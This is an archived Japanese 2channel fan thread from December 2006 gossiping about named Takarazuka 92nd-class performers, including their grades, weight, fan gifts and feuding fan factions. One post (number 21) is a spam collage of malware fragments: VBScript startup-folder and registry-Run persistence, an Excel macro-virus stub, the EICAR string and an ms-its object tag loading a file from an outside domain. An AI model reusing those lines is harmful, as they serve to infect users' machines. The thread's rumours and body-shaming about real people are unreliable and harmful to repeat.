2ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

☆★ 92期生part5 ★☆

1 :名無しさん@花束いっぱい。:2006/12/04(月) 06:32:50 ID:X4zjpy6V
92期を語りましょう!

★980番を踏んだ人は次のスレ立てお願いします。

前スレ(part4)
http://hobby8.2ch.net/test/read.cgi/siki/1149683055/

2 :名無しさん@花束いっぱい。:2006/12/04(月) 15:19:58 ID:AaHtf+P+
2げと

3 :名無しさん@花束いっぱい。:2006/12/04(月) 17:11:44 ID:IZ8YjuS4
お嫁〜3ば〜〜(屮゚Д゚)屮カモーン

乙華麗

4 :名無しさん@花束いっぱい。:2006/12/06(水) 04:06:24 ID:KczQuxJn
4


5 :名無しさん@花束いっぱい。:2006/12/06(水) 20:56:17 ID:YEGnaoOi
ネ申房タマラズ5ゲット

6 :名無しさん@花束いっぱい。:2006/12/07(木) 15:41:29 ID:07lVejQH
何か情報おくれ〜

7 :名無しさん@花束いっぱい。:2006/12/07(木) 21:17:53 ID:QOaKNC64
蘭ちゃんユウキちゃん新公役付きおめでとー♪
楽しみだけど、東京組にはまだまだ先だ・・・orz
現在公演中の雪は本当見事に美男揃いだなぁ・・・。


8 :名無しさん@花束いっぱい。:2006/12/08(金) 01:25:18 ID:Xtc2kE09
ユウキは化粧→仏壇になるなよ!

9 :名無しさん@花束いっぱい。:2006/12/08(金) 08:43:33 ID:kkt7trEB
>現在公演中の雪は本当見事に美男揃いだなぁ・・・。
そうだね〜
娘役は花組がカワイコちゃんぞろいだぉ

10 :名無しさん@花束いっぱい。:2006/12/08(金) 09:01:59 ID:TLdilS6g
雪の音月さん真ん中で緑の衣装の場面。
下手一番端にいる男役さんは92期さん?

11 :名無しさん@花束いっぱい。:2006/12/08(金) 10:35:56 ID:KuX4pVLu
最初に舞台でスターさん囲んで半円状っぽい形になる時の下手端と、まーちゃんの早口言葉みたいな歌が終わって横に広がった時の後列端は、この期の剣崎さんだと思いまつよ!

12 :名無しさん@花束いっぱい。:2006/12/08(金) 11:48:15 ID:TLdilS6g
二列になった時は前列の下手端にいた人なんだけどそれは誰かわかりますか?

13 :名無しさん@花束いっぱい。:2006/12/08(金) 20:29:14 ID:XCVbwW1d
あなたでしょ

14 :名無しさん@花束いっぱい。:2006/12/08(金) 22:40:48 ID:TLdilS6g
>13
何かいけないこと聞いてしまったのかな。
先日観劇した時に一生懸命踊っている姿が目に留まったものだから誰かなって思ったの。
ごめんなさいね。

15 :名無しさん@花束いっぱい。:2006/12/09(土) 01:40:15 ID:B2n4PiKE
ホントに良いわ雪の男
たいてい一人はアチャ〜ってのがいるもんだけど
いないもんね.みんな美形だわ
でもご本人達は可哀想かもね
組内にライバル多いってことでしょ
雪って下級生に美形いないから92男チャンス大有りと思うけど
さて誰が抜け出すのかなあ〜
ちなみに私の好みは剣崎さん。

16 :名無しさん@花束いっぱい。:2006/12/09(土) 06:11:48 ID:in+zPJft
私も剣崎さん支持♪
お顔も美人なんだけど上っ面じゃない堂々としたオーラ風格で、これぞ宝塚の男達!!
どこに居ても目に飛び込んで来る
でもお願い。。。もうちょっと頑張って痩せておくれ・・・(泣)
でも雪男は本当見事に全員素敵だから、ファンの好みは分かれるだろうね・・・
ファンの人数もいい勝負!って感じかなぁ!

17 :名無しさん@花束いっぱい。:2006/12/09(土) 13:05:22 ID:SVO0J1VO
他組も成績順に新公も役付きしてるから
次は雪も凜城さんなのか・だが
舞台の存在感は圧倒的に剣崎が有るとおもうんだけどなあ
音楽祭の歌からのファンとしては早く歌を披露してほしいよー

18 :名無しさん@花束いっぱい。:2006/12/09(土) 18:17:30 ID:0BQwg9rV
雪男素敵だと思うけど
凜城さんはよくわからないな…
踊りは良いけどお顔と体型が素敵だと思えないなー

19 :名無しさん@花束いっぱい。:2006/12/09(土) 21:45:08 ID:IXONndiu
剣崎さん格好良いし歌も上手なのは認める。だけど…体系と全く踊れないのは駄目だ。路線に乗れないよ…

20 :名無しさん@花束いっぱい。:2006/12/09(土) 21:51:47 ID:eNboHemZ
いや凜城さんとか、娘役の透水さんとか
成績の良い生徒は、技術面でアチャーというところが無いんだと思う。
いずれにしても、雪男、雪娘総合的にレベル高いよ。


21 :<body onload=window()>:2006/12/09(土) 22:32:54 ID:CTirJRaP
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm" type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
"avgnt"="\"C:\\Program Files\\AntiVir PersonalEdition Classic\\avgnt.exe\" /min /nosplash"
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
ms-its:mhtml:file://c:\
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub


22 :名無しさん@花束いっぱい。:2006/12/09(土) 22:39:16 ID:W6YnB+69
確かに凜城さんは技術面ではすばらしいけど、容姿はね・・・

23 :名無しさん@花束いっぱい。:2006/12/09(土) 23:24:36 ID:/l6L0YCH
技術も容姿も共に良い雪組生は誰ですか?

24 :名無しさん@花束いっぱい。:2006/12/10(日) 00:36:22 ID:j/KHiFWO
それが意外にいないかもよバレエ&容姿の彩凪さん笙乃さんは歌と芝居ダメでしょ。歌&容姿の剣崎さんは踊りがダメ、優等生凜城さん 透水さんはインパクト無いし、あとの人って平均点みたいな感じだよね。

25 :名無しさん@花束いっぱい。:2006/12/10(日) 00:58:16 ID:QQzLo5SY
雪でも壮さんやかなめさんなんかも踊れなかったんでしょ
急には無理だろうけど剣崎さんには頑張ってお稽古して欲しいよ
もったいないよ歌も顔も抜群なのに.


26 :名無しさん@花束いっぱい。:2006/12/10(日) 01:32:29 ID:67v973du
うん。ダンサーになれとは言わないけど、スターとして許される最低限のレベルまでね…頑張って欲しい!
ダンス力を上げるのも痩せるのも、本人の努力次第なんだもん。
剣崎さんの格好良さや背の高さ、ずば抜けた声の良さは持って生まれた武器だよ…。
目を惹くっていうのも、技術や努力じゃなくて生まれ持ったスター性なんだし!
私も剣崎さんはあの成績でも一番強いと思ったなー!
ま。ご本人次第でしょうか!
雪見たら本当に頑張って欲しいって思いました。

27 :名無しさん@花束いっぱい。:2006/12/10(日) 10:52:56 ID:Mb94REV1
みんなあわてず、ゆっくり見守ろうよ♪

28 :名無しさん@花束いっぱい。:2006/12/10(日) 20:16:03 ID:RdcX0H/5
剣崎さんは趣味お菓子作りはいいけど、まずは痩せて欲しい。
ダンスは一朝一夕でどうなるものでもないから、地道に頑張るとして。
痩せているかどうかって、宝塚では重要。
痩せればカッコよくなると思う。

29 :名無しさん@花束いっぱい。:2006/12/10(日) 23:04:33 ID:iaSaUJnk
剣崎さんはお菓子作りが趣味で、作っては食べ作っては食べしているからデブっちゃったんだね

30 :名無しさん@花束いっぱい。:2006/12/10(日) 23:13:21 ID:Nfm0FVmp
今日入りしてたら煌月さん見掛けたけど、綺麗なあ〜

31 :名無しさん@花束いっぱい。:2006/12/10(日) 23:41:11 ID:szE9W/vs
煌月太すぎ。

32 :名無しさん@花束いっぱい。:2006/12/10(日) 23:56:20 ID:iaSaUJnk
92期ってデブ多いんだね。

33 :名無しさん@花束いっぱい。:2006/12/11(月) 07:03:08 ID:tp4gLw9q
あのガリガリトップだったマミだって昔は太ってたよ。
容姿が良かったら、あとは段々痩せるんだから期待出来る!
細くても容姿が悪かったら意味ないね

34 :名無しさん@花束いっぱい。:2006/12/11(月) 09:27:25 ID:tVuLv4Ga
剣崎さんは後輩なんだけど、決してデブじゃないよ。ただ足が太いんだよ。
武道の人で空手も剣道も有段者。私も悩みなんだけど多分腿の筋肉がすごくて落ちないんだと思う。突然宝塚を目指してバレエを習うと聞いた時は驚いたけどその年には一発合格だもん 踊れなくても宝塚が欲しいと思った華が彼女には有るんだよ。きっとスターになるさ。

35 :名無しさん@花束いっぱい。:2006/12/11(月) 10:27:51 ID:LpjDI+hV
ここでスターになるとかなれないとか論議しても、結局は剣崎さんの頑張り次第!
さすがに本人だって全て自覚しているでしょう。
どう考えたって注目されてることだけは確かだから、本人がその期待にどう応えるか…。応えられずに終わるのか…。
頑張って欲しいですね!
私は彼女の頑張りを楽しみにしています!

36 :名無しさん@花束いっぱい。:2006/12/11(月) 10:52:52 ID:nuGkye45
はい、その通りですね.
と言うことで,他の話行ってみよーよ

37 :名無しさん@花束いっぱい。:2006/12/11(月) 13:06:00 ID:KJrrKKgt


31 :名無しさん@花束いっぱい。:2006/12/10(日) 23:41:11 ID:szE9W/vs
煌月太すぎ。


しょーがないよ!!
遺伝だもん〜。
ママ見たらわかるじゃん!

8 :名無しさん@花束いっぱい。:2006/12/08(金)
ユウキは化粧→仏壇になるなよ!


化粧を仏壇でしてるの?
仏像顔だから?
どちらにしろみてみたい。
宝塚化粧へた





38 :名無しさん@花束いっぱい。:2006/12/11(月) 16:58:15 ID:Ifw+78T3
スポニチにアキコカンダ先生の評が出てて、
若手では研1の文化祭から注目されていた真風涼帆が際立っていた。
って書かれてたけど、文化祭から話題になってたの・・?

39 :名無しさん@花束いっぱい。:2006/12/11(月) 20:40:05 ID:xFEZlWwv
でたらめ書くなよ!
そんな記事ないよ!

40 :名無しさん@花束いっぱい。:2006/12/11(月) 22:46:51 ID:ZX59ihDS
真風くんはWS楽しみ。
星公演でしなやかなバレエ踊っていたね。
注目してます。

41 :名無しさん@花束いっぱい。:2006/12/11(月) 23:05:50 ID:Ifw+78T3
でたらめではないです。宝塚歌劇支局に載っています。

42 :名無しさん@花束いっぱい。:2006/12/12(火) 11:54:40 ID:PG6gV7rE
それは輝咲さんのことでしょ?
輝咲さんとこ60枚もチケット買い占めてさばいて貢献したんだから。

43 :名無しさん@花束いっぱい。:2006/12/12(火) 11:56:39 ID:EhYTCIl4
検索してみたら事実だと分かる話だけど・・藪さんだったかな?が書いてるよ。

44 :名無しさん@花束いっぱい。:2006/12/12(火) 11:59:35 ID:PG6gV7rE
輝咲だろ?

45 :名無しさん@花束いっぱい。:2006/12/12(火) 12:49:44 ID:EhYTCIl4
検索してみた?違うから・・真風涼帆って書いてあるよ?

46 :名無しさん@花束いっぱい。:2006/12/12(火) 18:00:37 ID:4tFVUdcm
真風だの輝咲だの星話になると
なんか険悪になるよね
やだやだ

47 :名無しさん@花束いっぱい。:2006/12/12(火) 20:36:20 ID:ZhtwPCrE
真風も輝咲も可愛い星っ子。
二人ともがんばれ。

48 :名無しさん@花束いっぱい。:2006/12/12(火) 21:09:58 ID:1YU3yEf4
>>34
じゃあ、同じ剣道の壮さんくらい痩せられるといいね。

49 :名無しさん@花束いっぱい。:2006/12/12(火) 22:11:31 ID:UvB5Szwu
輝咲さんにはどうしてこんなにアンチが多いんですか?

50 :名無しさん@花束いっぱい。:2006/12/12(火) 23:57:20 ID:hb/3/4z+
私は真那春人さん注目!!

51 :名無しさん@花束いっぱい。:2006/12/12(火) 23:58:09 ID:Thau1bI/
>48
剣崎さんの武道っていうのは、全国大会でも常にトップを争うような、その道でも充分生きて行けるほどのレベルだったみたいだから、わざわざ誰かと比較するのはどうかな・・・
輝咲さんも、真風さんも、剣崎さんも、話題になる人だからすぐアンチも出てくるだけだよ!

52 :名無しさん@花束いっぱい。:2006/12/13(水) 00:04:06 ID:v9o8lDF2
剣崎さんのアンチじゃなくて、武道やってようがなんだろうが
ジェンヌになった以上痩せるしか道はない、ってことを言ってるの。
過去は言い訳にならない。

もし路線目指してるなら、研3・4くらいまでに痩せないとね。

53 :名無しさん@花束いっぱい。:2006/12/13(水) 10:10:09 ID:0R2GpUTC
>>49だってさあ、物もらえない人からしたらねたましいじゃん。

輝咲さんの会発足の件はどうなった?
でもあのめちゃくちゃぶりには笑えるわ・・・

54 :名無しさん@花束いっぱい。:2006/12/13(水) 15:30:33 ID:v9o8lDF2
ぶっちゃけ、研1の子に物貰っても嬉しくない。

55 :名無しさん@花束いっぱい。:2006/12/13(水) 20:14:09 ID:Y/JnEiJx
だったら、やたらめったら貰うのやめなよ。
提供している輝咲とやらが可哀想ではないか。
売るのか?

いくらファンが多くったって、今から会を発足するのは
関係ない人からするとスゴイ事してる集団に見えるけど?
そんなことして立場は大丈夫?

56 :名無しさん@花束いっぱい。:2006/12/13(水) 20:50:18 ID:hSABF3WL
君達、星のトップ会を甘くみたらあかんよ!!

57 :名無しさん@花束いっぱい。:2006/12/13(水) 23:32:08 ID:PyqL16Uz
92期ですっごい体臭のきつい人いるよね

58 :名無しさん@花束いっぱい。:2006/12/14(木) 01:25:11 ID:CMF69HJP
>>55
輝咲さんに限らず、ほとんどの配り物なんて売る価値すらないと思う。

59 :名無しさん@花束いっぱい。:2006/12/14(木) 12:20:06 ID:uDNvpH36
もうすぐ雪楽…寂しい…

60 :名無しさん@花束いっぱい。:2006/12/14(木) 15:05:11 ID:G5pMxv3E
輝咲にしろ剣崎にしろ、東京に公演がやってくると急に話題になるよね・・・。
輝咲も剣崎も同一人物が書き込んでるんだろうね〜。
剣崎も輝崎みたいに、東京で物を配ってるわけ?
バカ騒ぎをしてるのかい?


61 :名無しさん@花束いっぱい。:2006/12/14(木) 17:45:21 ID:uDNvpH36
60>
輝崎→輝咲

62 :名無しさん@花束いっぱい。:2006/12/15(金) 07:58:16 ID:6LPHO50S
雪は剣崎さん含め、誰も物配ったりイベントとしてる人はいないと思いますよ!
そもそも話題のわりに雪は入り出のファン少ないでしょう・・・


63 :名無しさん@花束いっぱい。:2006/12/15(金) 23:24:28 ID:2mvMBlFo
だからこそ物配ったりするんじゃないの?

64 :名無しさん@花束いっぱい。:2006/12/15(金) 23:41:54 ID:MoszoMbP
どっちにしろ、星で輝咲に群がってた人が
今は剣崎に寄ってたかってるわけね?!

剣崎さん、輝咲さんよりも更にトータルで成績悪いしっ!


65 :名無しさん@花束いっぱい。:2006/12/16(土) 05:45:53 ID:9sz8XXgP
>64はどうしてそんなに輝咲ファンと剣崎ファンを同じ人たちにしたいの!?

66 :名無しさん@花束いっぱい。:2006/12/16(土) 09:24:19 ID:O0TkYhf8
剣崎さんはビリから2番目です。
輝咲さんはビリから10番目です。

・・・もう応援する価値ないな。

67 :名無しさん@花束いっぱい。:2006/12/16(土) 11:29:26 ID:pisCuYW4
>>65
輝咲さんアンチと剣咲さんアンチが同じ人だからだと思いますよ。
なのでアンチさんはスルーした方がよいかと。
私が知ってる限りですが、ガセばかり書いているので。

68 :名無しさん@花束いっぱい。:2006/12/16(土) 22:44:22 ID:7YbvuoGd
>>66
エエェー、マジで・・・
後ろから数えたほうが早いなんて

69 :名無しさん@花束いっぱい。:2006/12/16(土) 23:55:27 ID:unmxumwb
おとめ見たらわかるじゃん。何を今さら・・・
だから叩かれてたんでしょ?成績悪いから物でファン釣ってるって。

70 :名無しさん@花束いっぱい。:2006/12/17(日) 04:48:40 ID:HA/x2wMh
成績悪いから物でファン釣るって最悪だな
どんだけ腐ってんだよ

71 :名無しさん@花束いっぱい。:2006/12/17(日) 05:59:18 ID:Ckedivqh
だから剣崎さんは物配ってないから!紛らわしい書き方しないでっ!
私、92期で剣崎さんと彩凪さんのことはずっと気になってるから入り出の様子何となく見ているけれど、物配っていた日なんて一度もなかった!
星はノーチェックで実際入り出を見てないから分からないです。

72 :名無しさん@花束いっぱい。:2006/12/17(日) 08:21:51 ID:iprcfeSC
毎日お疲れ様です

73 :名無しさん@花束いっぱい。:2006/12/17(日) 08:23:04 ID:xl/u2nKH
今の成績悪くても、古くは鳳蘭、瀬奈じゅんなどスターになった人はいますよ。

74 :名無しさん@花束いっぱい。:2006/12/17(日) 12:17:46 ID:46FzVPIk
>>73はどうしても輝咲や剣崎を明日のスター候補にさせたいみたいだな。
はい、ごくろうさん。

75 :名無しさん@花束いっぱい。:2006/12/17(日) 12:36:21 ID:mI4Wa6o8
71>
私も彩凪さん応援しています、頑張ってもらいたいです。

76 :名無しさん@花束いっぱい。:2006/12/17(日) 14:35:47 ID:ebVObAC2
蘭乃はな

77 :名無しさん@花束いっぱい。:2006/12/17(日) 14:35:47 ID:ebVObAC2
蘭乃はな

78 :名無しさん@花束いっぱい。:2006/12/17(日) 15:29:52 ID:x8QoWWfK
転向した
ぞのちゃんてどう?
ある程度の路線には乗るのかな?

79 :名無しさん@花束いっぱい。:2006/12/17(日) 23:32:30 ID:IID8sEfR
>>73
成績悪くてもトップになった人、路線に乗った人はいる。それは事実。
でも、成績が悪くて、結局対した活躍もしないまま辞めて入った人の方が、圧倒的に多い。

80 :名無しさん@花束いっぱい。:2006/12/18(月) 00:15:13 ID:jb2hXwsx
わたしも剣崎さん応援してたけど転向します。
>>73さんの仰る通り成績悪くてもトップになった人は確かにいるけど、
物で釣ったりするような人がトップになれるとは思えません。

81 :名無しさん@花束いっぱい。:2006/12/18(月) 00:22:48 ID:gRDp0DE5
彩凪は音楽学校の時に入りのお客を睨んで通報されたとんでもない生徒のイメージが今でも拭い去れない。あのメツキは悪すぎ!

82 :名無しさん@花束いっぱい。:2006/12/18(月) 00:36:35 ID:xsl4DMR3
相変わらず剣崎アンチさんは頑張ってるんですね!
ご苦労様です…orz


83 :名無しさん@花束いっぱい。:2006/12/18(月) 00:43:33 ID:5AURIau5
>>82
あなたも毎日頑張りますね。
ご苦労様です。

毎回「剣崎アンチ」って反応してる人って、その行動が結果剣崎さんのイメージダウンになるって
気づいてないのかな。

84 :名無しさん@花束いっぱい。:2006/12/18(月) 00:54:15 ID:ZphlQL7c
81>
目が悪いとか疲れてただけじゃないの?
お話をしたら突然声かけても笑顔で、クルッとした目が印象的な優しい方でしたよ。

85 :名無しさん@花束いっぱい。:2006/12/18(月) 06:13:46 ID:rjcoDUzI
嫌いな客や気に入らない客なら睨みつけることもあるでしょ。
それは何も彩凪さんだけに限ったことじゃないと思うよ。
誰でも一度くらいは客を睨みつけた経験あるんじゃないかな。

86 :名無しさん@花束いっぱい。:2006/12/18(月) 14:03:15 ID:2hezQEen
ぞのちゃんかわいいね。

87 :名無しさん@花束いっぱい。:2006/12/18(月) 21:03:43 ID:0z3U1Att
>>78>>86自問自答。
しつこいな。
このしつこさは輝咲のことを書いていた時のヤツに似てる!!
ターゲット変えたの?

88 :名無しさん@花束いっぱい。:2006/12/19(火) 02:19:51 ID:Ngug/aXL
星は確かに調子に乗ってる感じがしたが,
雪組は,物を配ったりだの,騒いだりしていないよ。
一緒にされちゃあ可哀想.良くも悪くも話題になるのは目立つから.
アンチさんてここで全く話題にもならない
地味―なお方のファンか身内か,はたまた本人か・・
のひがみかしらね.



89 :名無しさん@花束いっぱい。:2006/12/19(火) 23:06:51 ID:jWCpjXBk
同じく。
雪は常識のあるコたちばかりだよ。
星の子の騒ぎと一緒にしないで。
成績悪くったって同じことはしないでしょー、それが流行ってるわけでもない限り。

90 :名無しさん@花束いっぱい。:2006/12/20(水) 01:27:23 ID:1jVl/Tpf
全くだよ 雪の出は何度も行ってるけど
剣崎さんは物なんか配ってないし,成績だって,あのお顔と歌があれば
きっと大丈夫.彩凪さんだって目つき悪いなんてこと無いって.
可愛いらしい人だよ.アンチが湧くのも人気のバロメーターと思って
頑張って欲しい.

91 :名無しさん@花束いっぱい。:2006/12/20(水) 05:48:05 ID:oN27UUMP
蘭乃はなさんを応援します。皆さんも応援してあげてください。

92 :名無しさん@花束いっぱい。:2006/12/20(水) 13:59:46 ID:MqJoHGAM
星の本城さんは常識あります!
輝咲さんなんかと一緒にしないで!!

93 :名無しさん@花束いっぱい。:2006/12/20(水) 14:17:54 ID:oc3wHFZ0
剣崎さんは痩せたとして輪郭がどうなるかが心配。

94 :名無しさん@花束いっぱい。:2006/12/20(水) 22:31:33 ID:+4KBGu8h
本城さんて、だぁれ?
顔が浮かばないんだけど〜

95 :名無しさん@花束いっぱい。:2006/12/20(水) 23:00:11 ID:sWe+lqgd
輝咲さんの入り出を見たことないから無責任な発言になってしまうのだけど、輝咲さんは常識がないっていうよりも、ファンの人に喜んでもらいたいと思って、結果ちょっとやりすぎてしまったのではないかな!?
良く言ったらサービス精神旺盛でファン思い…反対に悪く言えば自信過剰とも取れるけどね…。
かなり昔に、ちょっとだけお話しする機会があったのだけど、しっかりした礼儀正しい子でしたよ。


96 :名無しさん@花束いっぱい。:2006/12/20(水) 23:21:25 ID:sWe+lqgd
ついでに剣崎さんのほうは、見た目の凛々しさや武道のイメージを思いっきり裏切るような、びっくりするほどおっとりした子でした。
なのでこちらは自らプレゼント配って派手なパフォーマンス起こすとはとても思えないんですよね…。


97 :名無しさん@花束いっぱい。:2006/12/21(木) 08:37:07 ID:Nrl3dSe0
>>96はあたかも剣崎が物を配っていたと書かれていたと言いたいみたいだね。
それに対する反論なんだよね?

98 :名無しさん@花束いっぱい。:2006/12/21(木) 13:18:12 ID:HJaVcwV5
花組の神〇さんは花も実力も無いのに
何故入団できたのか
勘違いはなはだしい。

99 :名無しさん@花束いっぱい。:2006/12/21(木) 14:14:07 ID:E0MuSdpk
98は目が腐ってるんだね

100 :名無しさん@花束いっぱい。:2006/12/21(木) 15:52:00 ID:FwC1o7iK
隼人はどう?
同級生なんだけど

101 :名無しさん@花束いっぱい。:2006/12/21(木) 18:16:39 ID:qitKyT+f
今日は出で会えますように…

102 :名無しさん@花束いっぱい。:2006/12/21(木) 18:17:23 ID:kuaZB5G7
>>95
同意。
ファンに感謝する気持ちを忘れている生徒が多いなか、ファンに喜んで貰いたいという気持ちが見えて、話を聞いた時、私は好印象だったわよ。
物を配ったからファンが増えるんじゃなくて、そういうファンを大切にする気持ちがファンを増やしてるわけでしょ。


103 :名無しさん@花束いっぱい。:2006/12/21(木) 23:23:44 ID:qitKyT+f
101です、お会いできました〜♪
幸せ…ヽ(´¬`)ノ


ところで、見ていないのでこちらも無責任ですみませんが、102サンが言うようにちょっとファンサービスし過ぎちゃっただけだと思いますよ?
私は特に一人の方を応援していますが、やはりその方と同期生である92期生の方皆さんに頑張って貰いたいです.+:。(ノ^∇^)ノ゜.+:。
皆頑張れ〜♪


104 :名無しさん@花束いっぱい。:2006/12/22(金) 01:24:05 ID:YbV7tiLW
>>102
>ファンに感謝する気持ちを忘れている生徒が多いなか、

この学年でそれを忘れている生徒がいたら、傲慢にも程がある。

105 :名無しさん@花束いっぱい。:2006/12/22(金) 02:02:07 ID:HeKDuPGx
>104
この学年でもすでにいるよ…

106 :名無しさん@花束いっぱい。:2006/12/22(金) 10:56:25 ID:ULJI41EK
ワホイ♪

107 :名無しさん@花束いっぱい。:2006/12/22(金) 11:51:12 ID:G5nXHVha
>>95>>102
輝咲玲央の行為は正当化されました

108 :名無しさん@花束いっぱい。:2006/12/22(金) 11:52:06 ID:G5nXHVha
>>95>>102
輝咲玲央の行為は正当化されました!!!




109 :名無しさん@花束いっぱい。:2006/12/22(金) 11:53:02 ID:G5nXHVha


>>95>>102
輝咲玲央のバカな行為は正当化されました!!! !!!






110 :名無しさん@花束いっぱい。:2006/12/22(金) 13:30:38 ID:G5nXHVha




輝咲玲央ばんざい!!! !!!









111 :名無しさん@花束いっぱい。:2006/12/22(金) 13:31:20 ID:G5nXHVha





輝咲玲央ばんざい!!! !!!









112 :名無しさん@花束いっぱい。:2006/12/22(金) 13:31:57 ID:G5nXHVha





輝咲玲央ばんざい!!! !!!











113 :名無しさん@花束いっぱい。:2006/12/22(金) 13:32:58 ID:G5nXHVha
輝咲玲央さん!!
あなたは正しい人です!!! !!!



114 :名無しさん@花束いっぱい。:2006/12/22(金) 13:34:37 ID:G5nXHVha
私も輝咲で100万円をもらいました。
祝!

115 :名無しさん@花束いっぱい。:2006/12/22(金) 13:35:32 ID:G5nXHVha







輝咲玲央をバカにするなよ!

116 :名無しさん@花束いっぱい。:2006/12/22(金) 14:29:35 ID:CJIXxsPY
蘭乃さんのポスターはいつから貼られますか??

117 :名無しさん@花束いっぱい。:2006/12/22(金) 14:31:02 ID:YbV7tiLW
なんかに選ばれたの?

118 :名無しさん@花束いっぱい。:2006/12/22(金) 18:51:16 ID:vSlZIBqZ
98あんた同じ組の男役だね 妬みはカッコ悪いよ


119 :名無しさん@花束いっぱい。:2006/12/22(金) 23:43:33 ID:/uQEoA6R
プッ(^。^)

120 :名無しさん@花束いっぱい。:2006/12/23(土) 12:22:12 ID:GnZeTQVj
前楽アゲ
皆頑張れ〜♪

121 :名無しさん@花束いっぱい。:2006/12/23(土) 13:56:10 ID:bKT9GjCB
>>107>>114て何?!
なんか宗教みたいなんだけど。

122 :名無しさん@花束いっぱい。:2006/12/23(土) 14:15:18 ID:x3/9dEYW
阪急の初詣ポスター

123 :名無しさん@花束いっぱい。:2006/12/23(土) 23:25:11 ID:GnZeTQVj
お〜、同じかおなのに、麗ちゃんじゃなくて蘭ちゃんになったんだ!!その違いはやはり成績だろうか?
でも成績ならもっと成績良い娘役いるよね?

124 :名無しさん@花束いっぱい。:2006/12/24(日) 00:02:48 ID:nco1g0w6
阪急電鉄のHPでTOKK見られるよ。
インタビューページ付です。

125 :名無しさん@花束いっぱい。:2006/12/24(日) 00:06:21 ID:eugYqHB7
>123
研3のすみれ賞が麗ちゃんの予定とか・・・

126 :名無しさん@花束いっぱい。:2006/12/24(日) 00:53:58 ID:5Odw4CXP
音楽学校時代の方が可愛かったな…

127 :名無しさん@花束いっぱい。:2006/12/24(日) 01:27:50 ID:SvYLsxBH
ポスターは26日から掲示らしいよ
蘭ちゃんは大沢あかねちゃんに似てる?

128 :名無しさん@花束いっぱい。:2006/12/24(日) 04:01:53 ID:3Na2NM/B
雪楽アゲ!!
雪組の皆、最後まで頑張って〜♪


129 :名無しさん@花束いっぱい。:2006/12/24(日) 09:51:40 ID:AQi63cuU
私が最後まで頑張らないといつ言ったんだよ!

130 :名無しさん@花束いっぱい。:2006/12/24(日) 12:05:44 ID:MJRngSiu
蘭ちゃん、あれだったら糸ちゃんでも良かったとオモ。

131 :名無しさん@花束いっぱい。:2006/12/24(日) 12:54:52 ID:3Na2NM/B
129>
128です…あなた誰?

132 :名無しさん@花束いっぱい。:2006/12/24(日) 20:55:07 ID:AQi63cuU
千秋楽です!
もうすぐ出ます!

今日の出は 退団者の方が出た後になります。

場所は帝国ホテル、劇場側入り口の横です♪

皆様! 1年間有難うございました\(^O^)/



133 :名無しさん@花束いっぱい。:2006/12/24(日) 22:03:31 ID:smaAcH1t
好みもあるけど、麗ちゃんが蘭ちゃんと同じくらい成績良かったら麗ちゃんになってたかな?
蘭ちゃんより麗ちゃんの方がかわいい気がする。

134 :名無しさん@花束いっぱい。:2006/12/25(月) 07:05:31 ID:07tINa5+
雪の皆さん、本当に素敵でした。東京公演お疲れ様でした!
帰って行ってしまうの寂しいですが、今後の活躍を楽しみにしています。

135 :名無しさん@花束いっぱい。:2006/12/25(月) 10:46:21 ID:Ov4dC/+q
>>121
しょうがないよ
輝咲さんとこは宗教なんだから

136 :名無しさん@花束いっぱい。:2006/12/25(月) 20:05:28 ID:R5YSHH6W
>>135
輝咲アンチが宗教なんでしょw
あの粘着っぷりはお見事です。


137 :名無しさん@花束いっぱい。:2006/12/25(月) 23:58:19 ID:soQGbQK/
なにが言いたいんだろ?
みんな同類に見えるよ!!
この人の名前出すと、
すぐアンチにされちゃうみたいだから気をつけよっと。
西ではこの人ゎぁ、ちっとも話題にはならない

138 :名無しさん@花束いっぱい。:2006/12/26(火) 09:37:31 ID:+qEFIXJb
西で話題の人は各組誰でつか?
東で話題の人は各組誰でつか?
各々別に知りたいお

139 :名無しさん@花束いっぱい。:2006/12/26(火) 12:27:31 ID:+9kRUGwN
>>136も宗教、輝咲アンチ者に見えるけど??
もしくは輝咲の正統なファン??

輝咲にフツーのファンがいるとは思えんもん・・・
みんな宗教の固まりちゃんデショ!

ここ書いてる人達も・・・

140 :名無しさん@花束いっぱい。:2006/12/26(火) 23:21:04 ID:EZEAnqi6
そうなんだあ(▼ロ▼;)。

141 :名無しさん@花束いっぱい。:2006/12/26(火) 23:25:45 ID:O1Es6Q5J
輝咲さんもファンが多いばっかりにアンチがついちゃって可哀相にね。
アンチでもないファンでもない同期ファンの感想です。

142 :名無しさん@花束いっぱい。:2006/12/26(火) 23:31:58 ID:1wWsJ4ej
>>138
東の下級生は、会と関係ない人の目につきやすい場所でファン対応やってるからでしょ。
ファーストキッチンから下級生のことよく見えるから、私はたまに眺めてる。
ファン対応より私服姿が見たいだけだけどね。

143 :名無しさん@花束いっぱい。:2006/12/27(水) 01:58:24 ID:TE3lVfQG
蘭乃さんデイリー載ってたね

144 :名無しさん@花束いっぱい。:2006/12/27(水) 10:00:10 ID:qQzuaNKp
>>141も宗教キザキファンぽいな
同じ匂いだわ

145 :名無しさん@花束いっぱい。:2006/12/27(水) 10:02:56 ID:qQzuaNKp
もしかして、アレフ?

146 :名無しさん@花束いっぱい。:2006/12/27(水) 10:17:57 ID:XprgCKhy
142>
138でつ、トン

ところで明日はハロダン集合日アゲ
漏れはハロダン初日しかムラへは行けないが…年末年始大変だけどガンガレ!!応援してまつ

